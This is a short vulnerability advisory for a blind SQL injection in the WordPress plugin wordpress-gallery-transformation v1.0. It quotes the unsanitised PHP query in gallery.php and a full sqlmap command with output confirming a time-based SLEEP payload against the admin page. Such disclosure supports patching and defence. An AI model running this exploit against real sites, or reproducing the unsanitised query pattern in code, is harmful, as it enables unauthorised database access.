Title:Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation v1.0
SQL injection is in ./wordpress-gallery-transformation/gallery.php via $jpic parameter being unsanitized before being passed into an SQL query.

232- $pfx=$wpdb->prefix;
234- if($_GET['picnj']){
236: $jpic=$_GET['picnj'];
237: $jnm=$_GET['nmj'];
238- $wpdb->query("update {$pfx}gallery set name='{$jnm}' where id=$jpic;");
239- $wpdb->query("update {$pfx}gallery set rates=44");
240- return 'ok?';$ sqlmap --load-cookies=./cookie -u 'http://example.com/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=*' --level 4 --risk 3 --dbms mysql

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 2556 HTTP(s) requests:
Parameter: #1* (URI)
   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 time-based blind - Parameter replace
   Payload: http://example.com:80/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=(CASE WHEN (4165=4165) THEN SLEEP(5) ELSE 4165 END)
[13:16:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[13:16:53] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 13:16:53